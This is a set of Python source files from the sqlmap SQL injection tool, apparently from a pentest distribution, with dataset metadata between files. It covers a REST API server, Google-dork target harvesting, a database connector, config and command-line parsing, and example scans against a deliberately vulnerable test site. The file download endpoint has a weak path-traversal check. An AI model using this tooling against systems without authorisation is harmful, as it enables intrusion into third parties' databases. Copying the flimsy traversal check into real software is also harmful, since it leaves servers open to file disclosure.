scan_data(taskid): """ Retrieve the data of a scan """ json_data_message = list() json_errors_message = list() if taskid not in DataStore.tasks: logger.warning("[%s] Invalid task ID provided to scan_data()" % taskid) return jsonize({"success": False, "message": "Invalid task ID"}) # Read all data from the IPC database for the taskid for status, content_type, value in DataStore.current_db.execute( "SELECT status, content_type, value FROM data WHERE taskid = ? ORDER BY id ASC", (taskid,)): json_data_message.append( {"status": status, "type": content_type, "value": dejsonize(value)}) # Read all error messages from the IPC database for error in DataStore.current_db.execute( "SELECT error FROM errors WHERE taskid = ? 
ORDER BY id ASC", (taskid,)): json_errors_message.append(error) logger.debug("[%s] Retrieved scan data and error messages" % taskid) return jsonize({"success": True, "data": json_data_message, "error": json_errors_message}) # Functions to handle scans' logs @get("/scan/<taskid>/log/<start>/<end>") def scan_log_limited(taskid, start, end): """ Retrieve a subset of log messages """ json_log_messages = list() if taskid not in DataStore.tasks: logger.warning("[%s] Invalid task ID provided to scan_log_limited()") return jsonize({"success": False, "message": "Invalid task ID"}) if not start.isdigit() or not end.isdigit() or end < start: logger.warning("[%s] Invalid start or end value provided to scan_log_limited()" % taskid) return jsonize({"success": False, "message": "Invalid start or end value, must be digits"}) start = max(1, int(start)) end = max(1, int(end)) # Read a subset of log messages from the IPC database for time_, level, message in DataStore.current_db.execute( ("SELECT time, level, message FROM logs WHERE " "taskid = ? AND id >= ? AND id <= ? ORDER BY id ASC"), (taskid, start, end)): json_log_messages.append({"time": time_, "level": level, "message": message}) logger.debug("[%s] Retrieved scan log messages subset" % taskid) return jsonize({"success": True, "log": json_log_messages}) @get("/scan/<taskid>/log") def scan_log(taskid): """ Retrieve the log messages """ json_log_messages = list() if taskid not in DataStore.tasks: logger.warning("[%s] Invalid task ID provided to scan_log()") return jsonize({"success": False, "message": "Invalid task ID"}) # Read all log messages from the IPC database for time_, level, message in DataStore.current_db.execute( "SELECT time, level, message FROM logs WHERE taskid = ? ORDER BY id ASC", (taskid,)): json_log_messages.append({"time": time_, "level": level, "message": message}) logger.debug("[%s] Retrieved scan log messages" % taskid) return jsonize({"success": True, "log": json_log_messages}) # Function to handle files inside the output directory @get("/download/<taskid>/<target>/<filename:path>") def download(taskid, target, filename): """ Download a certain file from the file system """ if taskid not in DataStore.tasks: logger.warning("[%s] Invalid task ID provided to download()" % taskid) return jsonize({"success": False, "message": "Invalid task ID"}) # Prevent file path traversal - the lame way if ".." in target: logger.warning("[%s] Forbidden path (%s)" % (taskid, target)) return jsonize({"success": False, "message": "Forbidden path"}) path = os.path.join(paths.SQLMAP_OUTPUT_PATH, target) if os.path.exists(path): logger.debug("[%s] Retrieved content of file %s" % (taskid, target)) with open(path, 'rb') as inf: file_content = inf.read() return jsonize({"success": True, "file": file_content.encode("base64")}) else: logger.warning("[%s] File does not exist %s" % (taskid, target)) return jsonize({"success": False, "message": "File does not exist"}) def server(host="0.0.0.0", port=RESTAPI_SERVER_PORT): """ REST-JSON API server """ DataStore.admin_id = hexencode(os.urandom(16)) Database.filepath = tempfile.mkstemp(prefix="sqlmapipc-", text=False)[1] logger.info("Running REST-JSON API server at '%s:%d'.." 
% (host, port)) logger.info("Admin ID: %s" % DataStore.admin_id) logger.debug("IPC database: %s" % Database.filepath) # Initialize IPC database DataStore.current_db = Database() DataStore.current_db.connect() DataStore.current_db.init() # Run RESTful API run(host=host, port=port, quiet=True, debug=False) def client(host=RESTAPI_SERVER_HOST, port=RESTAPI_SERVER_PORT): """ REST-JSON API client """ addr = "http://%s:%d" % (host, port) logger.info("Starting REST-JSON API client to '%s'..." % addr) # TODO: write a simple client with requests, for now use curl from command line logger.error("Not yet implemented, use curl from command line instead for now, for example:") print "\n\t$ curl http://%s:%d/task/new" % (host, port) print ("\t$ curl -H \"Content-Type: application/json\" " "-X POST -d '{\"url\": \"http://testphp.vulnweb.com/artists.php?artist=1\"}' " "http://%s:%d/scan/:taskid/start") % (host, port) print "\t$ curl http://%s:%d/scan/:taskid/data" % (host, port) print "\t$ curl http://%s:%d/scan/:taskid/log\n" % (host, port)
22,481
Python
.py
529
34.744802
103
0.627877
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
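api.py's client() above stops at printing curl examples; the same calls are easy to drive from Python. A sketch against the endpoints the record defines (/task/new, /scan/<taskid>/start, /scan/<taskid>/status, /scan/<taskid>/data), using the default host and port and the record's example target URL:

import json
import urllib.request

API = "http://127.0.0.1:8775"  # RESTAPI_SERVER_HOST:RESTAPI_SERVER_PORT defaults

def call(path, payload=None):
    data = json.dumps(payload).encode() if payload is not None else None
    headers = {"Content-Type": "application/json"} if data else {}
    request = urllib.request.Request(API + path, data=data, headers=headers)
    return json.loads(urllib.request.urlopen(request).read())

taskid = call("/task/new")["taskid"]                 # GET creates a new task
call("/scan/%s/start" % taskid,                      # POST options, launch the engine
     {"url": "http://testphp.vulnweb.com/artists.php?artist=1"})
print(call("/scan/%s/status" % taskid))              # poll until status is "terminated"
print(call("/scan/%s/data" % taskid))                # collected results and errors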
18,988
__init__.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/utils/__init__.py
#!/usr/bin/env python """ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ pass
150
Python
.py
6
23.666667
62
0.746479
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
18,989
getch.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/utils/getch.py
#!/usr/bin/env python """ Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ class _Getch(object): """ Gets a single character from standard input. Does not echo to the screen (reference: http://code.activestate.com/recipes/134892/) """ def __init__(self): try: self.impl = _GetchWindows() except ImportError: try: self.impl = _GetchMacCarbon() except(AttributeError, ImportError): self.impl = _GetchUnix() def __call__(self): return self.impl() class _GetchUnix(object): def __init__(self): import tty def __call__(self): import sys import termios import tty fd = sys.stdin.fileno() old_settings = termios.tcgetattr(fd) try: tty.setraw(sys.stdin.fileno()) ch = sys.stdin.read(1) finally: termios.tcsetattr(fd, termios.TCSADRAIN, old_settings) return ch class _GetchWindows(object): def __init__(self): import msvcrt def __call__(self): import msvcrt return msvcrt.getch() class _GetchMacCarbon(object): """ A function which returns the current ASCII key that is down; if no ASCII key is down, the null string is returned. The page http://www.mactech.com/macintosh-c/chap02-1.html was very helpful in figuring out how to do this. """ def __init__(self): import Carbon Carbon.Evt # see if it has this (in Unix, it doesn't) def __call__(self): import Carbon if Carbon.Evt.EventAvail(0x0008)[0] == 0: # 0x0008 is the keyDownMask return '' else: # # The event contains the following info: # (what,msg,when,where,mod)=Carbon.Evt.GetNextEvent(0x0008)[1] # # The message (msg) contains the ASCII char which is # extracted with the 0x000000FF charCodeMask; this # number is converted to an ASCII character with chr() and # returned # (what, msg, when, where, mod) = Carbon.Evt.GetNextEvent(0x0008)[1] return chr(msg & 0x000000FF) getch = _Getch()
2,305
Python
.py
68
25.602941
78
0.593877
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
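Illustrative usage for lib/utils/getch.py above (not part of the dataset record): read unechoed keypresses until 'q' is pressed, assuming the sqlmap tree is on the import path.

from lib.utils.getch import getch

while True:
    ch = getch()
    if ch in ('q', 'Q'):
        break
    print "pressed: %r" % ch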
18,990
google.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/utils/google.py
#!/usr/bin/env python

"""
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""

import cookielib
import httplib
import re
import socket
import urllib
import urllib2

from lib.core.common import getUnicode
from lib.core.common import readInput
from lib.core.common import urlencode
from lib.core.data import conf
from lib.core.data import logger
from lib.core.enums import CUSTOM_LOGGING
from lib.core.enums import HTTP_HEADER
from lib.core.exception import SqlmapConnectionException
from lib.core.exception import SqlmapGenericException
from lib.core.settings import GOOGLE_REGEX
from lib.core.settings import DUCKDUCKGO_REGEX
from lib.core.settings import HTTP_ACCEPT_ENCODING_HEADER_VALUE
from lib.core.settings import UNICODE_ENCODING
from lib.request.basic import decodePage
from lib.request.httpshandler import HTTPSHandler

class Google(object):
    """
    This class defines methods used to perform Google dorking (command
    line option '-g <google dork>')
    """

    def __init__(self, handlers):
        self._cj = cookielib.CookieJar()

        handlers.append(urllib2.HTTPCookieProcessor(self._cj))
        handlers.append(HTTPSHandler())

        self.opener = urllib2.build_opener(*handlers)
        self.opener.addheaders = conf.httpHeaders

        try:
            conn = self.opener.open("http://www.google.com/ncr")
            conn.info()  # retrieve session cookie
        except Exception, ex:
            errMsg = "unable to connect to Google ('%s')" % ex
            raise SqlmapConnectionException(errMsg)

    def search(self, dork):
        """
        This method performs the effective search on Google providing
        the google dork and the Google session cookie
        """
        gpage = conf.googlePage if conf.googlePage > 1 else 1
        logger.info("using Google result page #%d" % gpage)

        if not dork:
            return None

        url = "http://www.google.com/search?"
        url += "q=%s&" % urlencode(dork, convall=True)
        url += "num=100&hl=en&complete=0&safe=off&filter=0&btnG=Search"
        url += "&start=%d" % ((gpage - 1) * 100)

        try:
            conn = self.opener.open(url)

            requestMsg = "HTTP request:\nGET %s" % url
            requestMsg += " %s" % httplib.HTTPConnection._http_vsn_str
            logger.log(CUSTOM_LOGGING.TRAFFIC_OUT, requestMsg)

            page = conn.read()
            code = conn.code
            status = conn.msg
            responseHeaders = conn.info()
            page = decodePage(page, responseHeaders.get("Content-Encoding"), responseHeaders.get("Content-Type"))

            responseMsg = "HTTP response (%s - %d):\n" % (status, code)

            if conf.verbose <= 4:
                responseMsg += getUnicode(responseHeaders, UNICODE_ENCODING)
            elif conf.verbose > 4:
                responseMsg += "%s\n%s\n" % (responseHeaders, page)

            logger.log(CUSTOM_LOGGING.TRAFFIC_IN, responseMsg)
        except urllib2.HTTPError, e:
            try:
                page = e.read()
            except socket.timeout:
                warnMsg = "connection timed out while trying "
                warnMsg += "to get error page information (%d)" % e.code
                logger.critical(warnMsg)
                return None
        except (urllib2.URLError, socket.error, socket.timeout):
            errMsg = "unable to connect to Google"
            raise SqlmapConnectionException(errMsg)

        retVal = [urllib.unquote(match.group(1)) for match in re.finditer(GOOGLE_REGEX, page, re.I | re.S)]

        if not retVal and "detected unusual traffic" in page:
            warnMsg = "Google has detected 'unusual' traffic from "
            warnMsg += "used IP address disabling further searches"
            raise SqlmapGenericException(warnMsg)

        if not retVal:
            message = "no usable links found. "
            message += "do you want to (re)try with DuckDuckGo? [Y/n] "
            output = readInput(message, default="Y")

            if output.strip().lower() != 'n':
                url = "https://duckduckgo.com/d.js?"
                url += "q=%s&p=%d&s=100" % (urlencode(dork, convall=True), gpage)

                if not conf.randomAgent:
                    self.opener.addheaders = [_ for _ in self.opener.addheaders if _[0].lower() != HTTP_HEADER.USER_AGENT.lower()]
                    self.opener.addheaders.append((HTTP_HEADER.USER_AGENT, "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:24.0) Gecko/20100101 Firefox/24.0"))

                self.opener.addheaders = [_ for _ in self.opener.addheaders if _[0].lower() != HTTP_HEADER.ACCEPT_ENCODING.lower()]
                self.opener.addheaders.append((HTTP_HEADER.ACCEPT_ENCODING, HTTP_ACCEPT_ENCODING_HEADER_VALUE))

                try:
                    conn = self.opener.open(url)

                    requestMsg = "HTTP request:\nGET %s" % url
                    requestMsg += " %s" % httplib.HTTPConnection._http_vsn_str
                    logger.log(CUSTOM_LOGGING.TRAFFIC_OUT, requestMsg)

                    page = conn.read()
                    code = conn.code
                    status = conn.msg
                    responseHeaders = conn.info()
                    page = decodePage(page, responseHeaders.get("Content-Encoding"), responseHeaders.get("Content-Type"))

                    responseMsg = "HTTP response (%s - %d):\n" % (status, code)

                    if conf.verbose <= 4:
                        responseMsg += getUnicode(responseHeaders, UNICODE_ENCODING)
                    elif conf.verbose > 4:
                        responseMsg += "%s\n%s\n" % (responseHeaders, page)

                    logger.log(CUSTOM_LOGGING.TRAFFIC_IN, responseMsg)
                except urllib2.HTTPError, e:
                    try:
                        page = e.read()
                    except socket.timeout:
                        warnMsg = "connection timed out while trying "
                        warnMsg += "to get error page information (%d)" % e.code
                        logger.critical(warnMsg)
                        return None
                except (urllib2.URLError, socket.error, socket.timeout):
                    errMsg = "unable to connect to DuckDuckGo"
                    raise SqlmapConnectionException(errMsg)

                retVal = [urllib.unquote(match.group(1)) for match in re.finditer(DUCKDUCKGO_REGEX, page, re.I | re.S)]

        return retVal
6,515
Python
.py
129
38.620155
155
0.605131
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
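Illustrative sketch for lib/utils/google.py above (not part of the dataset record): the search-URL and pagination arithmetic from Google.search(), standalone; urllib.quote_plus stands in for sqlmap's urlencode helper.

import urllib

def google_search_url(dork, gpage=1):
    # 100 results per page, so page N starts at offset (N - 1) * 100
    url = "http://www.google.com/search?"
    url += "q=%s&" % urllib.quote_plus(dork)
    url += "num=100&hl=en&complete=0&safe=off&filter=0&btnG=Search"
    url += "&start=%d" % ((gpage - 1) * 100)
    return url

print google_search_url('inurl:".php?id="', gpage=2)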
18,991
sqlalchemy.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/utils/sqlalchemy.py
#!/usr/bin/env python

"""
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""

import imp
import logging
import os
import re
import sys
import warnings

_sqlalchemy = None

try:
    f, pathname, desc = imp.find_module("sqlalchemy", sys.path[1:])
    _ = imp.load_module("sqlalchemy", f, pathname, desc)
    if hasattr(_, "dialects"):
        _sqlalchemy = _
        warnings.simplefilter(action="ignore", category=_sqlalchemy.exc.SAWarning)
except ImportError:
    pass

try:
    import MySQLdb  # used by SQLAlchemy in case of MySQL
    warnings.filterwarnings("error", category=MySQLdb.Warning)
except ImportError:
    pass

from lib.core.data import conf
from lib.core.data import logger
from lib.core.exception import SqlmapConnectionException
from lib.core.exception import SqlmapFilePathException
from plugins.generic.connector import Connector as GenericConnector

class SQLAlchemy(GenericConnector):
    def __init__(self, dialect=None):
        GenericConnector.__init__(self)
        self.dialect = dialect

    def connect(self):
        if _sqlalchemy:
            self.initConnection()

            try:
                if not self.port and self.db:
                    if not os.path.exists(self.db):
                        raise SqlmapFilePathException, "the provided database file '%s' does not exist" % self.db

                    _ = conf.direct.split("//", 1)
                    conf.direct = "%s////%s" % (_[0], os.path.abspath(self.db))

                if self.dialect:
                    conf.direct = conf.direct.replace(conf.dbms, self.dialect, 1)

                engine = _sqlalchemy.create_engine(conf.direct, connect_args={'check_same_thread': False} if self.dialect == "sqlite" else {})
                self.connector = engine.connect()
            except SqlmapFilePathException:
                raise
            except Exception, msg:
                raise SqlmapConnectionException("SQLAlchemy connection issue ('%s')" % msg[0])

            self.printConnected()

    def fetchall(self):
        try:
            retVal = []
            for row in self.cursor.fetchall():
                retVal.append(tuple(row))
            return retVal
        except _sqlalchemy.exc.ProgrammingError, msg:
            logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg.message if hasattr(msg, "message") else msg)
            return None

    def execute(self, query):
        try:
            self.cursor = self.connector.execute(query)
        except (_sqlalchemy.exc.OperationalError, _sqlalchemy.exc.ProgrammingError), msg:
            logger.log(logging.WARN if conf.dbmsHandler else logging.DEBUG, "(remote) %s" % msg.message if hasattr(msg, "message") else msg)
        except _sqlalchemy.exc.InternalError, msg:
            raise SqlmapConnectionException(msg[1])

    def select(self, query):
        self.execute(query)
        return self.fetchall()
2,985
Python
.py
71
33.56338
141
0.647465
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
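Illustrative sketch for lib/utils/sqlalchemy.py above (not part of the dataset record): what SQLAlchemy.connect() boils down to for a SQLite target, using the era-appropriate (pre-1.4) SQLAlchemy API that accepts raw SQL strings on a connection; the database path is a placeholder.

import sqlalchemy

engine = sqlalchemy.create_engine("sqlite:////tmp/example.db",
                                  connect_args={"check_same_thread": False})
connection = engine.connect()
for row in connection.execute("SELECT 1 AS answer"):
    print tuple(row)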
18,992
progress.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/utils/progress.py
#!/usr/bin/env python

"""
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""

from lib.core.common import getUnicode
from lib.core.common import dataToStdout
from lib.core.data import conf
from lib.core.data import kb

class ProgressBar(object):
    """
    This class defines methods to update and draw a progress bar
    """

    def __init__(self, minValue=0, maxValue=10, totalWidth=None):
        self._progBar = "[]"
        self._oldProgBar = ""
        self._min = int(minValue)
        self._max = int(maxValue)
        self._span = max(self._max - self._min, 0.001)
        self._width = totalWidth if totalWidth else conf.progressWidth
        self._amount = 0
        self._times = []
        self.update()

    def _convertSeconds(self, value):
        seconds = value
        minutes = seconds / 60
        seconds = seconds - (minutes * 60)
        return "%.2d:%.2d" % (minutes, seconds)

    def update(self, newAmount=0):
        """
        This method updates the progress bar
        """
        if newAmount < self._min:
            newAmount = self._min
        elif newAmount > self._max:
            newAmount = self._max

        self._amount = newAmount

        # Figure out the new percent done, round to an integer
        diffFromMin = float(self._amount - self._min)
        percentDone = (diffFromMin / float(self._span)) * 100.0
        percentDone = round(percentDone)
        percentDone = min(100, int(percentDone))

        # Figure out how many hash bars the percentage should be
        allFull = self._width - len("100%% [] %s/%s ETA 00:00" % (self._max, self._max))
        numHashes = (percentDone / 100.0) * allFull
        numHashes = int(round(numHashes))

        # Build a progress bar with an arrow of equal signs
        if numHashes == 0:
            self._progBar = "[>%s]" % (" " * (allFull - 1))
        elif numHashes == allFull:
            self._progBar = "[%s]" % ("=" * allFull)
        else:
            self._progBar = "[%s>%s]" % ("=" * (numHashes - 1), " " * (allFull - numHashes))

        # Add the percentage at the beginning of the progress bar
        percentString = getUnicode(percentDone) + "%"
        self._progBar = "%s %s" % (percentString, self._progBar)

    def progress(self, deltaTime, newAmount):
        """
        This method saves item delta time and shows updated progress bar
        with calculated eta
        """
        if len(self._times) <= ((self._max * 3) / 100) or newAmount > self._max:
            eta = None
        else:
            midTime = sum(self._times) / len(self._times)
            midTimeWithLatest = (midTime + deltaTime) / 2
            eta = midTimeWithLatest * (self._max - newAmount)

        self._times.append(deltaTime)
        self.update(newAmount)
        self.draw(eta)

    def draw(self, eta=None):
        """
        This method draws the progress bar if it has changed
        """
        if self._progBar != self._oldProgBar:
            self._oldProgBar = self._progBar
            dataToStdout("\r%s %d/%d%s" % (self._progBar, self._amount, self._max, (" ETA %s" % self._convertSeconds(int(eta))) if eta is not None else ""))
            if self._amount >= self._max:
                if not conf.liveTest:
                    dataToStdout("\r%s\r" % (" " * self._width))
                    kb.prependFlag = False
                else:
                    dataToStdout("\n")

    def __str__(self):
        """
        This method returns the progress bar string
        """
        return getUnicode(self._progBar)
3,654
Python
.py
88
32.090909
157
0.571348
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
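Illustrative usage for lib/utils/progress.py above (not part of the dataset record): a hypothetical loop from inside an initialized sqlmap session -- draw() consults conf.liveTest and kb.prependFlag, so conf and kb must already be populated before this would run.

import time

from lib.utils.progress import ProgressBar

bar = ProgressBar(minValue=0, maxValue=50, totalWidth=60)
for i in xrange(1, 51):
    started = time.time()
    time.sleep(0.05)  # stand-in for one retrieval step
    bar.progress(time.time() - started, i)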
18,993
timeout.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/utils/timeout.py
#!/usr/bin/env python

"""
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""

import threading

from lib.core.data import logger
from lib.core.enums import CUSTOM_LOGGING

def timeout(func, args=(), kwargs={}, duration=1, default=None):
    class InterruptableThread(threading.Thread):
        def __init__(self):
            threading.Thread.__init__(self)
            self.result = None

        def run(self):
            try:
                self.result = func(*args, **kwargs)
            except Exception, msg:
                logger.log(CUSTOM_LOGGING.TRAFFIC_IN, msg)
                self.result = default

    thread = InterruptableThread()
    thread.start()
    thread.join(duration)

    if thread.isAlive():
        return default
    else:
        return thread.result
850
Python
.py
26
25.576923
64
0.636475
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
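Illustrative usage for lib/utils/timeout.py above (not part of the dataset record): give a slow call two seconds, then fall back to the default. Note that join(duration) only abandons the worker thread; the wrapped call keeps running in the background.

import time

from lib.utils.timeout import timeout

def slow_lookup(value):
    time.sleep(5)  # deliberately slower than the allowed duration
    return value * 2

print timeout(func=slow_lookup, args=(21,), duration=2, default="n/a")  # prints "n/a"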
18,994
headers.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/parse/headers.py
#!/usr/bin/env python

"""
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""

import itertools
import os

from lib.core.common import checkFile
from lib.core.common import parseXmlFile
from lib.core.data import kb
from lib.core.data import paths
from lib.parse.handler import FingerprintHandler

def headersParser(headers):
    """
    This function calls a class that parses the input HTTP headers to
    fingerprint the back-end database management system operating system
    and the web application technology
    """
    if not kb.headerPaths:
        kb.headerPaths = {
            "cookie": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "cookie.xml"),
            "microsoftsharepointteamservices": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "sharepoint.xml"),
            "server": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "server.xml"),
            "servlet-engine": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "servlet.xml"),
            "set-cookie": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "cookie.xml"),
            "x-aspnet-version": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "x-aspnet-version.xml"),
            "x-powered-by": os.path.join(paths.SQLMAP_XML_BANNER_PATH, "x-powered-by.xml"),
        }

    for header in itertools.ifilter(lambda x: x in kb.headerPaths, headers):
        value = headers[header]
        xmlfile = kb.headerPaths[header]
        checkFile(xmlfile)
        handler = FingerprintHandler(value, kb.headersFp)
        parseXmlFile(xmlfile, handler)
        parseXmlFile(paths.GENERIC_XML, handler)
1,737
Python
.py
35
43.342857
114
0.653869
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
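Hypothetical call for lib/parse/headers.py above (not part of the dataset record): header names must match the lower-case kb.headerPaths keys, and paths/kb must have been initialized by sqlmap beforehand.

from lib.core.data import kb
from lib.parse.headers import headersParser

headersParser({
    "server": "Apache/2.2.22 (Ubuntu)",     # matched against server.xml
    "x-powered-by": "PHP/5.3.10-1ubuntu3",  # matched against x-powered-by.xml
})
print kb.headersFp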
18,995
configfile.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/parse/configfile.py
#!/usr/bin/env python

"""
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""

import codecs

from ConfigParser import MissingSectionHeaderError
from ConfigParser import ParsingError

from lib.core.common import checkFile
from lib.core.common import unArrayizeValue
from lib.core.common import UnicodeRawConfigParser
from lib.core.data import conf
from lib.core.data import logger
from lib.core.exception import SqlmapMissingMandatoryOptionException
from lib.core.exception import SqlmapSyntaxException
from lib.core.optiondict import optDict
from lib.core.settings import UNICODE_ENCODING

config = None

def configFileProxy(section, option, boolean=False, integer=False):
    """
    Parse configuration file and save settings into the configuration
    advanced dictionary.
    """
    global config

    if config.has_option(section, option):
        try:
            if boolean:
                value = config.getboolean(section, option) if config.get(section, option) else False
            elif integer:
                value = config.getint(section, option) if config.get(section, option) else 0
            else:
                value = config.get(section, option)
        except ValueError, ex:
            errMsg = "error occurred while processing the option "
            errMsg += "'%s' in provided configuration file ('%s')" % (option, str(ex))
            raise SqlmapSyntaxException(errMsg)

        if value:
            conf[option] = value
        else:
            conf[option] = None
    else:
        debugMsg = "missing requested option '%s' (section " % option
        debugMsg += "'%s') into the configuration file, " % section
        debugMsg += "ignoring. Skipping to next."
        logger.debug(debugMsg)

def configFileParser(configFile):
    """
    Parse configuration file and save settings into the configuration
    advanced dictionary.
    """
    global config

    debugMsg = "parsing configuration file"
    logger.debug(debugMsg)

    checkFile(configFile)
    configFP = codecs.open(configFile, "rb", UNICODE_ENCODING)

    try:
        config = UnicodeRawConfigParser()
        config.readfp(configFP)
    except (MissingSectionHeaderError, ParsingError), ex:
        errMsg = "you have provided an invalid configuration file ('%s')" % str(ex)
        raise SqlmapSyntaxException(errMsg)

    if not config.has_section("Target"):
        errMsg = "missing a mandatory section 'Target' in the configuration file"
        raise SqlmapMissingMandatoryOptionException(errMsg)

    condition = not config.has_option("Target", "direct")
    condition &= not config.has_option("Target", "url")
    condition &= not config.has_option("Target", "logFile")
    condition &= not config.has_option("Target", "bulkFile")
    condition &= not config.has_option("Target", "googleDork")
    condition &= not config.has_option("Target", "requestFile")
    condition &= not config.has_option("Target", "sitemapUrl")
    condition &= not config.has_option("Target", "wizard")

    if condition:
        errMsg = "missing a mandatory option in the configuration file "
        errMsg += "(direct, url, logFile, bulkFile, googleDork, requestFile, sitemapUrl or wizard)"
        raise SqlmapMissingMandatoryOptionException(errMsg)

    for family, optionData in optDict.items():
        for option, datatype in optionData.items():
            datatype = unArrayizeValue(datatype)
            boolean = datatype == "boolean"
            integer = datatype == "integer"
            configFileProxy(family, option, boolean, integer)
3,620
Python
.py
82
37.390244
100
0.698124
pwnieexpress/raspberry_pwn
1,024
184
8
GPL-3.0
9/5/2024, 5:12:22 PM (Europe/Amsterdam)
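Illustrative sketch for lib/parse/configfile.py above (not part of the dataset record): a minimal INI file that passes the mandatory 'Target' checks in configFileParser(); the temporary path is a placeholder.

from lib.parse.configfile import configFileParser

sample = "[Target]\nurl = http://testphp.vulnweb.com/artists.php?artist=1\n"
with open("/tmp/sqlmap-sample.conf", "w") as fp:
    fp.write(sample)

configFileParser("/tmp/sqlmap-sample.conf")  # populates conf from the file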
18,996
cmdline.py
pwnieexpress_raspberry_pwn/src/pentest/sqlmap/lib/parse/cmdline.py
#!/usr/bin/env python

"""
Copyright (c) 2006-2014 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""

import os
import shlex
import sys

from optparse import OptionError
from optparse import OptionGroup
from optparse import OptionParser
from optparse import SUPPRESS_HELP

from lib.core.common import checkDeprecatedOptions
from lib.core.common import checkSystemEncoding
from lib.core.common import expandMnemonics
from lib.core.common import getUnicode
from lib.core.data import cmdLineOptions
from lib.core.data import conf
from lib.core.data import logger
from lib.core.defaults import defaults
from lib.core.enums import AUTOCOMPLETE_TYPE
from lib.core.exception import SqlmapShellQuitException
from lib.core.settings import BASIC_HELP_ITEMS
from lib.core.settings import DUMMY_URL
from lib.core.settings import IS_WIN
from lib.core.settings import MAX_HELP_OPTION_LENGTH
from lib.core.settings import VERSION_STRING
from lib.core.shell import autoCompletion
from lib.core.shell import clearHistory
from lib.core.shell import loadHistory
from lib.core.shell import saveHistory

def cmdLineParser():
    """
    This function parses the command line parameters and arguments
    """
    checkSystemEncoding()

    _ = getUnicode(os.path.normpath(sys.argv[0]), encoding=sys.getfilesystemencoding())

    usage = "%s%s [options]" % ("python " if not IS_WIN else "", "\"%s\"" % _ if " " in _ else _)

    parser = OptionParser(usage=usage)

    try:
        parser.add_option("--hh", dest="advancedHelp", action="store_true", help="Show advanced help message and exit")
        parser.add_option("--version", dest="showVersion", action="store_true", help="Show program's version number and exit")
        parser.add_option("-v", dest="verbose", type="int", help="Verbosity level: 0-6 (default %d)" % defaults.verbose)

        # Target options
        target = OptionGroup(parser, "Target", "At least one of these options has to be provided to define the target(s)")
        target.add_option("-d", dest="direct", help="Connection string for direct database connection")
        target.add_option("-u", "--url", dest="url", help="Target URL (e.g. \"http://www.site.com/vuln.php?id=1\")")
        target.add_option("-l", dest="logFile", help="Parse target(s) from Burp or WebScarab proxy log file")
        target.add_option("-x", dest="sitemapUrl", help="Parse target(s) from remote sitemap(.xml) file")
        target.add_option("-m", dest="bulkFile", help="Scan multiple targets given in a textual file")
        target.add_option("-r", dest="requestFile", help="Load HTTP request from a file")
        target.add_option("-g", dest="googleDork", help="Process Google dork results as target URLs")
        target.add_option("-c", dest="configFile", help="Load options from a configuration INI file")

        # Request options
        request = OptionGroup(parser, "Request", "These options can be used to specify how to connect to the target URL")
        request.add_option("--data", dest="data", help="Data string to be sent through POST")
        request.add_option("--param-del", dest="paramDel", help="Character used for splitting parameter values")
        request.add_option("--cookie", dest="cookie", help="HTTP Cookie header value")
        request.add_option("--cookie-del", dest="cookieDel", help="Character used for splitting cookie values")
        request.add_option("--load-cookies", dest="loadCookies", help="File containing cookies in Netscape/wget format")
        request.add_option("--drop-set-cookie", dest="dropSetCookie", action="store_true", help="Ignore Set-Cookie header from response")
        request.add_option("--user-agent", dest="agent", help="HTTP User-Agent header value")
        request.add_option("--random-agent", dest="randomAgent", action="store_true", help="Use randomly selected HTTP User-Agent header value")
        request.add_option("--host", dest="host", help="HTTP Host header value")
        request.add_option("--referer", dest="referer", help="HTTP Referer header value")
        request.add_option("--headers", dest="headers", help="Extra headers (e.g. \"Accept-Language: fr\\nETag: 123\")")
        request.add_option("--auth-type", dest="authType", help="HTTP authentication type (Basic, Digest, NTLM or PKI)")
        request.add_option("--auth-cred", dest="authCred", help="HTTP authentication credentials (name:password)")
        request.add_option("--auth-private", dest="authPrivate", help="HTTP authentication PEM private key file")
